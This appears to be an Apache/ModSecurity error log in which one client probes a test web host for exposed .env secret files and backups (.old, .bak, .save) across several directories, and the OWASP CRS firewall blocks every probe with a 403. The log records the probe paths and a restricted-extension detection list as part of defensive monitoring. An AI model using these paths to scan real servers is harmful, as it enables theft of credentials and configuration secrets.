[Tue Nov 18 14:51:27.028104 2025] [:error] [pid 160239] [client 34.235.129.146:51348] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRx53-1NcONF8naoxQFe9wAAAAw"]
[Tue Nov 18 14:51:27.028251 2025] [:error] [pid 160239] [client 34.235.129.146:51348] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRx53-1NcONF8naoxQFe9wAAAAw"]
[Tue Nov 18 14:51:27.028434 2025] [:error] [pid 160239] [client 34.235.129.146:51348] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRx53-1NcONF8naoxQFe9wAAAAw"]
[Tue Nov 18 14:51:27.028573 2025] [:error] [pid 160239] [client 34.235.129.146:51348] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aRx53-1NcONF8naoxQFe9wAAAAw"]
[Tue Nov 18 14:51:27.057685 2025] [authz_core:error] [pid 166202] [client 34.235.129.146:51356] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.old
[Tue Nov 18 14:51:27.080192 2025] [authz_core:error] [pid 154301] [client 34.235.129.146:51370] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Nov 18 14:51:27.103357 2025] [:error] [pid 160906] [client 34.235.129.146:51384] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.bak"] [unique_id "aRx53_7FUeIdxVPAs5iguwAAAAY"]
[Tue Nov 18 14:51:27.103545 2025] [:error] [pid 160906] [client 34.235.129.146:51384] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.bak"] [unique_id "aRx53_7FUeIdxVPAs5iguwAAAAY"]
[Tue Nov 18 14:51:27.103758 2025] [:error] [pid 160906] [client 34.235.129.146:51384] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.bak"] [unique_id "aRx53_7FUeIdxVPAs5iguwAAAAY"]
[Tue Nov 18 14:51:27.103909 2025] [:error] [pid 160906] [client 34.235.129.146:51384] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.bak"] [unique_id "aRx53_7FUeIdxVPAs5iguwAAAAY"]
[Tue Nov 18 14:51:30.277783 2025] [:error] [pid 160237] [client 34.235.129.146:51408] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRx54k0XkfZCrdQo7dFhWgAAAAM"]
[Tue Nov 18 14:51:30.278015 2025] [:error] [pid 160237] [client 34.235.129.146:51408] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRx54k0XkfZCrdQo7dFhWgAAAAM"]
[Tue Nov 18 14:51:30.278176 2025] [:error] [pid 160237] [client 34.235.129.146:51408] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aRx54k0XkfZCrdQo7dFhWgAAAAM"]
[Tue Nov 18 14:51:30.306392 2025] [:error] [pid 160901] [client 34.235.129.146:51398] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRx54h54imVYfbO8_klVVQAAAAU"]
[Tue Nov 18 14:51:30.306622 2025] [:error] [pid 160901] [client 34.235.129.146:51398] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRx54h54imVYfbO8_klVVQAAAAU"]
[Tue Nov 18 14:51:30.306796 2025] [:error] [pid 160901] [client 34.235.129.146:51398] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aRx54h54imVYfbO8_klVVQAAAAU"]
[Tue Nov 18 14:51:30.434365 2025] [:error] [pid 163656] [client 34.235.129.146:51418] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.bak"] [unique_id "aRx54sCoCYNOyUBImXwJLQAAAAc"]
[Tue Nov 18 14:51:30.434532 2025] [:error] [pid 163656] [client 34.235.129.146:51418] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.bak"] [unique_id "aRx54sCoCYNOyUBImXwJLQAAAAc"]
[Tue Nov 18 14:51:30.434743 2025] [:error] [pid 163656] [client 34.235.129.146:51418] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.bak"] [unique_id "aRx54sCoCYNOyUBImXwJLQAAAAc"]
[Tue Nov 18 14:51:30.434893 2025] [:error] [pid 163656] [client 34.235.129.146:51418] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.bak"] [unique_id "aRx54sCoCYNOyUBImXwJLQAAAAc"]
[Tue Nov 18 14:51:30.459918 2025] [:error] [pid 153863] [client 34.235.129.146:51428] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRx54uo53hvRBsk5IfbhWgAAAAA"]
[Tue Nov 18 14:51:30.460067 2025] [:error] [pid 153863] [client 34.235.129.146:51428] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRx54uo53hvRBsk5IfbhWgAAAAA"]
[Tue Nov 18 14:51:30.460254 2025] [:error] [pid 153863] [client 34.235.129.146:51428] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRx54uo53hvRBsk5IfbhWgAAAAA"]
[Tue Nov 18 14:51:30.460399 2025] [:error] [pid 153863] [client 34.235.129.146:51428] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRx54uo53hvRBsk5IfbhWgAAAAA"]
[Tue Nov 18 14:51:30.467190 2025] [:error] [pid 160881] [client 34.235.129.146:51440] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRx54sKvHpCFfzvQgqZeygAAAAQ"]
[Tue Nov 18 14:51:30.467346 2025] [:error] [pid 160881] [client 34.235.129.146:51440] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRx54sKvHpCFfzvQgqZeygAAAAQ"]
[Tue Nov 18 14:51:30.467493 2025] [:error] [pid 160881] [client 34.235.129.146:51440] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aRx54sKvHpCFfzvQgqZeygAAAAQ"]
[Tue Nov 18 14:51:30.481815 2025] [:error] [pid 160877] [client 34.235.129.146:51424] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRx54ggYjeY2f7-QfdJuqgAAAAI"]
[Tue Nov 18 14:51:30.481979 2025] [:error] [pid 160877] [client 34.235.129.146:51424] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRx54ggYjeY2f7-QfdJuqgAAAAI"]
[Tue Nov 18 14:51:30.482134 2025] [:error] [pid 160877] [client 34.235.129.146:51424] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aRx54ggYjeY2f7-QfdJuqgAAAAI"]
[Tue Nov 18 14:51:52.336024 2025] [:error] [pid 160239] [client 34.235.129.146:32902] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRx5-O1NcONF8naoxQFe-AAAAAw"]
[Tue Nov 18 14:51:52.336197 2025] [:error] [pid 160239] [client 34.235.129.146:32902] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRx5-O1NcONF8naoxQFe-AAAAAw"]
[Tue Nov 18 14:51:52.336409 2025] [:error] [pid 160239] [client 34.235.129.146:32902] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRx5-O1NcONF8naoxQFe-AAAAAw"]
[Tue Nov 18 14:51:52.336580 2025] [:error] [pid 160239] [client 34.235.129.146:32902] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRx5-O1NcONF8naoxQFe-AAAAAw"]
[Tue Nov 18 14:51:52.338866 2025] [:error] [pid 166202] [client 34.235.129.146:32910] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRx5-LjjT4drRne9BbQuqgAAAAk"]
[Tue Nov 18 14:51:52.339079 2025] [:error] [pid 166202] [client 34.235.129.146:32910] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRx5-LjjT4drRne9BbQuqgAAAAk"]
[Tue Nov 18 14:51:52.339245 2025] [:error] [pid 166202] [client 34.235.129.146:32910] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRx5-LjjT4drRne9BbQuqgAAAAk"]
